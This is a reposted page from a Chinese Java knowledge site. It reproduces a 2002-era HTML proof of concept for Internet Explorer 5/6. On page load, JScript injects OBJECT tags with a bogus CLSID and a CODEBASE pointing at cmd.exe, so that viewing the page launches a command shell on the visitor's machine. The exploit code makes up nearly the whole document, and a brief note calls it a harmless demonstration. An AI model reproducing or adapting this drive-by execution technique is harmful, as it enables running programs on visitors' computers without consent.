登录/注册
JAVA知识库
javascript运行客户端exe程序
转自:互联网
<!DOCTYPEHTMLPUBLIC"-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <TITLE>IE6security...</TITLE> <styletype="text/css"> BODY{ font-family:Arial,Helvetica,sans-serif; font-size:16px; color:#222222; background-color:#aaaabb } H1{ background-color:#222222; color:#aaaabb } </style> <METAhttp-equiv=Content-Typecontent="text/html; charset=windows-1252"> <SCRIPTlanguage=JScript> var programName=new Array( 'c:/windows/system32/cmd.exe', 'c:/winnt/system32/cmd.exe', 'c:/cmd.exe' ); function Init(){ var oPopup=window.createPopup(); var oPopBody=oPopup.document.body; var n,html=''; for(n=0;n<programName.length;n++) html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>"; oPopBody.innerHTML=html; oPopup.show(290,190,200,200,document.body); } </SCRIPT> </head> <BODYonload="Init()"> <H1>Hmm,let's start a command shell...</H1> <p> Thispagedoesn't do anything malicious, but is a demonstration of how to execute a program on a remote machine using the marvelouslysecureInternetExplorerwebbrowser!! </p> <p> Upuntilatleast18/02/02,thisscriptwouldopenacommandwindowwhenviewed in IE5/6underWindowsXPandWin2k(possiblyalsoWinME).There arecurrentlynopatchesavailableusing"Windows Update"whichwillpreventthis. </p> </BODY> </HTML>